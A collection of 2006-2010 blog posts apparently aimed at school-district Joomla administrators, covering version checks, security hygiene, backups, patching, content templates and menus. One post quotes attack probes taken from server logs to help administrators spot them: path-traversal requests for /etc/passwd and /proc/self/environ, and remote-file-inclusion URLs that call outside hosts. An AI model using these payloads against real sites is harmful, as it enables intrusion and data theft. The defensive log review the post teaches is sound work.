|
Written by Ken Task
|
|
Friday, 16 July 2010 05:55 |
|
one doesn't have Admin login:
fgrep '$RELEASE' /var/www/html/libraries/joomla/version.php;
fgrep '$DEV_LEVEL' /var/www/html/libraries/joomla/version.php
Will show release version (like 1.5) and the patch (.##) level.
http://www.joomla.org/announcements/release-news/
http://docs.joomla.org/Upgrade_Instructions
http://docs.joomla.org/Category:Version_1.5.19_FAQ
http://docs.joomla.org/Vulnerable_Extensions_List
|
|
Written by Ken Task
|
|
Wednesday, 02 June 2010 18:10 |
Often when discussing/cussing security of operating systems, Windows folks point out that the most popular will draw attention of those that would do harm because there's more 'bang for the buck'. That's true of open source apps too. And, since many ISD's have firewalls, port 80 is one of the few open ports to the inner ISD network. Thus, Joomla's and port 80 anything is a potential target. Now that school is out … maybe little johnny hacker will be more inclined to try out some stuff, too! Got Joomla with some add-ons installed? When's the last time you checked on the versions of those add-ons? When's the last time you paid attention to logwatch reports (the web server section) and investigated? Might be time you did! There are active scans/probes looking for weak/vulnerable add-ons to Joomla's and IF your Joomla is not up to the latest version 1.5.18 and IF those add-ons have issues, your site is in danger of getting root kitted. The following is for Linux boxen with Webmin installed.How to check activity:Login to your webmin. Go to System -> System Logs Click the "view" link for the /var/log/httpd/access_log line. The view will show the last 20 lines of that log. To see what/who is probing your server, change the "Last" number 20 to 200000. and in the "Only show lines with text" type: ../../../ Then click "Refresh". First … DON'T PANIC! You might be seeing just a probe and your server is NOT in danger at all.
BUT, some investigation is in order for if they point to a vulnerable add-on, you might have a problem.What you'll see is something like below: 137.118.32.10 - - [23/May/2010:08:27:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"Explanation: Note that in the example above, it shows 404 responses by the server. 404 is not found. But, given the example, that could be that the server from which this clip was taken isn't running joomla add-on com_fabrick. Also note that it was probing for /proc/self/environ which is just information … but information they shouldn't be seeing anyway so there is reason for concern. Any activity such as above is bad, but here's an example of ones that should raise your eyebrows! 174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_docman=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"Explanation: Again note: 404's but notice what they are seeking … /etc/passwrd. Now we're getting more serious, huh? Lines like this one could indicate a problem: 121.190.102.21 - - [21/May/2010:07:25:13 -0500] "GET /////////?cmd&file=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 200 30597 "-" "Mozilla/5.0"or this one: 65.60.53.122 - - [31/May/2010:11:18:55 -0500] "GET /////////?cmd&file=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 29958 "-" "Mozilla/5.0"NOTE: 200 code … in this case, that's not good. bellschool.net is another Joomla located overseas. Solutions:1. make sure, if you see any com_ that is installed, it is the latest version. IF not the latest version and you can't find an update to it, consider removing the component/add-on. 2. you could start either: a. using .htaccess deny/allow to block IP ranges or maybe entire countries from accessing your web server. b. check into using mod-rewrite and rules for libwww-perl to deny or report gone responses to request that ID the browser agent as libwww-perl. See: Time for some Joomla Spring Cleaning?SOSSIG http://sos.tcea.org/index.php?option=com_content&view=article&id=540:time-for-some-joomla-spring-cleaning&catid=96:joomla-tips&Itemid=338or SOSTX http://www.sosoftexas.org/joomla15/index.php?option=com_content&view=article&id=466:time-for-some-joomla-spring-cleaning&catid=71:joomla-tips&Itemid=201for more info and links. |
|
Written by Ken Task
|
|
Wednesday, 02 June 2010 11:13 |
For those of you that run Joomla's, might want to add this to your list of things to do on a regular basis. Joomla core is normally secure and easy to update with the update component installed (JUpdateMan). That component, however, won't update all that you might have added. As such, please consider checking this resource: http://secunia.com/advisories/search/?search=joomlaIt will show what 3rd party add-on components have issues. First, of course, might be a good idea to note what add-ons you've installed. Login to Admin side. Go to Extensions, Install/Uninstall, then the tab for Components. You'll see a listing which shows name, version numbers, and Author. Those that show "Joomla Project" are core. 3rd party components might show authors name or provide a non-clickable URL. Holding mouse over author name will render a pop-up tool showing the URL to the web site and author EMmail address. The fixes might be simple if the 3rd party add-on is still being maintained - just install the latest/most secure version. IF it doesn't appear there is an updated version, best to remove it. Don't forget, if you were using it, removing it may not be possible until you un-link or if you can remove with no warning, you might have broken some link in your menus. Set the display of components to "all", then print to a PDF file for future checking. Another very good resource for checking all kinds of open source software vulnerabilities: http://www.exploit-db.com/It's a jungle out there, isn't it? :( |
|
Written by Ken Task
|
|
Tuesday, 24 July 2007 04:11 |
Seems an upgrade has quietly "sneaked" out without much fanfare due to events like Austin's JoomlaDay and the release of Joomla!1.5 RC. IT DOES CONTAIN SOME SECURITY FIXES AND IS RECOMMENDED. I have tested on a couple of sites and the patch has not produced any problems.
Joomla does warn that once you upgrade to this version, you will not be able to roll it back, so it is strongly advised one make a complete and total backup of not only the web site, but the databases as well.
Please use the index of this article to access desired area.
How to backup webroot:
This *best done from the command line* ... [directions are via ssh (remote) but can also be done via Terminal while logged onto the server as root user]. The backup of the database best done via Webmin.
1. ssh to server and login - su to root
2. cd /var/www/html [ENTER]
3. tar -cvf joomlabackup.tar ./* [ENTER]
(this will create a joomlabackup.tar file in /var/www/html/ directory retaining permissions on all files and folders. Suggest you download to your workstation via web browser but leave the tar file there in case you have to "restore" the site after upgrade.)
Backup of database via Webmin
1. launch browser and logon to your Webmin: https://[your_server]:10000
2. Servers -> MySQL
3. Open the database for Joomla (double click it's icon)
4. in the resulting screen it will complain about having too many tables to display and you will see a search screen. Look at the bottom row of buttons and click the "Backup Database".
5. in the resulting screen, "backup to file" dialog box, type:
/var/www/html/[yourdatabasename].sql
where [yourdatabasename] IS your joomla database name ... hint, you can also see the database name in the description paragraph just above the dialog boxes.
Example: my Joomla database is called "joomla" so the sql file name is "joomla.sql"
5. scroll to bottom of form, and click "Save and backup now" button.
6. As you did with the tar ball, suggest you open a browser window and download the SQL file to your local workstation.
** NOTE: if you have multiple Joomla installs (per campus) follow the same procedure above for ALL Joomla databases.
How to upgrade from 1.0.12 to 1.0.13
A GUI way - with JoomlaXplorer
I'd highly recommend Joomla! users get JoomlaXplorer. This tool will allow you to upgrade without any command line.
1. Download the patch:
http://joomlacode.org/gf/download/frsrelease/5097/13408/Joomla_1.0.12_to_1.0.13-Stable-Patch_Package.tar.gz
2. Using a browser, go to your Joomla's admin backend
3. Assuming you have JoomlaXplorer installed, go to the components menu, JoomlaXplorer.
4. make sure you are in the web root folder ... JoomlaXplorer will see one level up from web root.
5. upload the patch tar.gz file to the web root.
6. In JoomlaXplorer, click the check box on the line that shows the patch file, then click the "unarchive" button. You will get a warning prompt. Click OK.
7. After the file is untarred/gzipped, the patch is complete and you can safely remove the patch tar.gz file.
8. In the Administrator interface, go to "Home" and look at the bottom of the display to see if the version now says 1.0.13.
NOTE: there is now an addition in Site, Global Configuration, Server tab to set
"Register Globals Emulation" to OFF (NOT ON). Don't forget to save that change!
Suggest you logout and then log back in again ... front end as well as back end
to assure yourself that all is well! ;)
Done!
NOTE: if you have multple Joomla installations (per campus) repeat the above for EACH Joomla installaton.
Command line way
(ssh [remote] is described, but one can do same from terminal window while sitting at the keyboard of the server itself):
1. ssh into server and su to root
2. cd /var/www/html/ (assuming this is your Joomla! web root).
3. wget http://joomlacode.org/gf/download/frsrelease/5097/13408/Joomla_1.0.12_to_1.0.13-Stable-Patch_Package.tar.gz [ENTER]
4. tar zxvf *.tar.gz [ENTER]
5. chown apache:apache * -R [ENTER] (DON'T SKIP THIS STEP).
6. launch a web browser and go to your Joomla's administrator backend. After logging on, look at the bottom of the display to see version.
In either case, suggest you surf your site to assure yourself that all is well!
NOTE: if you have multple Joomla installations (per campus) repeat the above for EACH Joomla installaton.
*** THIS IS VERY IMPORTANT! ***
IF YOU HAVE PREVIOUSLY INSTALLED JOOMLA ACCESS CONTROL LIST YOU MUST ACQUIRE THE UPGRADE/FIX/PATCH FROM THE MAKER OF JOOMLA ACCESS CONTROL LIST. DO NOT ATTEMPT TO APPLY THE PATCH FROM JOOMLA.ORG.
Note: I've checked the JACL site and have not seen a patch available for upgrading to 1.0.13. Please use the contact form on the JACL web site to inquire with the author.
http://www.byostech.com/component/option,com_contact/catid,3/Itemid,3/
JACL Main web site:
http://www.byostech.com/
If you need assistance, please call or EMail. IF I am to remotely assist, I need:
1. access to your installed Webmin (port 10000 must be opened in your firewall)
2. an administrative level account on your Joomla
(note: if JoomlaXplorer is NOT installed, I need your permission to install and you might still need to change permissions on certain folders on your server for me to be able to use it remotely).
|
|
Written by Ken Task
|
|
Monday, 11 September 2006 06:08 |
Joomla! CMS is a very flexible CMS. Not only does one have site templates (which can be assigned to Section/Content area of Joomla! - ie, the template changes with the content), but one may also develop their own "templates" for content categories.
Take the following senario and example:
We have an Elementary Section and Category specifically for Elementary content.
The campus desires to "push" all they can a category in their content called
"Parent Letters". The parent letters are sent home with the students every week and are a summary of what each grade is doing, concentrating upon, etc..
(Goliad ISD does this).
The Parent Letter has the following sections:
* Title with the date
* a logo
* a section for Special Announcements
* a section for Reminders
* a section for each Curricular area: Math, Science, Reading, Writing,
and so on ...
* at the bottom a set of navigational links or anything one desires.
(this is all placed into an HTML table with "hints" like "Title: replace me" or "add content here").
Each Elementary submitter then does NOT have to "re-invent the wheel" and every Parent Letter that is online follows a similar format! :)
IF one has the JCE HTML plugins loaded into the JCE Editor, here's a how-2:
1. begin a new article
2. build your table with the characteristics as mentioned above - or anyway you desire.
3. press the return key a few times to open some space above your "footer".
4. Now to save the template. Click the "save template" button in the JCE editor and make sure you save it in the "templates" folder with a descriptive name, something like "parentletter". The editor will add the file name extension .html for you.
5. Cancel the new article you've begun.
Next time an Elementary teacher logs on to create a Parent Letter, they just have to load the template (parentletter), fill in the table with appropriate content, set to publish, and save. Done, for another week ... and it's taken just a few minutes time.
Screen shots (illustrations):
Menu example - shows links to Parent Letter Blogs
The JCE Editor's icons for Templates: 
Selecting or saving the template:
Previewing Template:
BTW, creating it online FIRST gives one the advantages in:
* creating a PDF file of the article on the fly (click the PDF icon when viewing the article).
* EMailing the article to a distribution list of parents
IF one has Acajoom NewsLetters installed in Joomla, the teacher can create a new submission and distribute to all parents that have subcribed! One less item for
the "forgetful child" to loose! :)
* Printing X number of copies of the article for sending home with students.
Since, in Joomla!, these areas have been setup as "blogs", the most recent Parent Letter is listed first AND all the previous weeks Parent Letters are still accessbile!
Visit GISD's GES area to see the output ... right now there is only 2nd Grade.
http://labahia.goliadisd.org/joomla/index.php?option=com_content&task=blogcategory&id=71&Itemid=161
SOS site syndication.
|
|
Written by Ken Task
|
|
Monday, 11 September 2006 02:35 |
For those of you that have already become Joomla! Experts, this is NOT something new to you, but to those of us that take a little longer to "catch on" (like me!), it might be! ;)
In Joomla! CMS one can create versions of menus and have them display only on certain Section/Categories. In other words, the menus can change.
Take for example, a High School Joomla! whose organization is by curricular areas - one Section content area for say "Social Studies" and several Categories under such as "Civics", "Economics", "World History", "American History", etc..
One could have a link on the main menu for "Curriculum", which, when clicked upon basically clears the main menu of the site and presents a menu of curriculum areas - one of which is "Social Studies". Clicking "Social Studies" an expanded menu drops to show all the "categories" under that section as well as display a "Social Studies" Department "home page".
Yes, this does take more time in configuring the site, but when finished the Joomla!Master has accomplished a couple of things:
1. viewers are directed to the "beef" and a "focus" is set according to their selection
2. saved some "screen territory" ... a precious commodity ... as it is a fact that most
"surfers" won't scroll down a screen very far at all.
You might visit the SOS Joomla! web site for a "working" example.
http://www.sosoftexas.org/
Items of interest: SOS Menu, SOS Web Links,
Goliad ISD's Joomla! (under development) is another good example:
http://labahia.goliadisd.org/joomla/
GISD, GHS, GMS, GES have their own menus.
NOTE: the link above may eventually break when the site goes live! In the event it has gone live, just stripe out the /joomla/ in the URL and TIA (try it again!). Also, let me know about the broken link and I'll correct it.
Some "out there" might be thinking, "drop down-extended menus" would do the same and are "better". Well, that might be true ... it all depends upon your ISD's "accessibility compliance" (how well vision-impaired screen readers can handle the "drop down-extended menus").
For more information about accessibility issues, please see the National Center on Disability and Access to Education site at:
http://ncdae.org/tools/factsheets/cms.cfm
Note: Joomla! is specifically mentioned ... as well as Moodle.
Joomla: http://help.joomla.org/content/view/805/125/
Moodle: http://docs.moodle.org/en/Accessibility
On a related note: many web sites use links to Word documents, PowerPoint, and PDF. The National Center site above specifically addresses those mention:
Word: http://ncdae.org/tools/factsheets/word.cfm
PowerPoint: http://ncdae.org/tools/factsheets/powerpoint.cfm
PDF: http://ncdae.org/tools/factsheets/pdf.cfm
SOS site syndication.
|
|
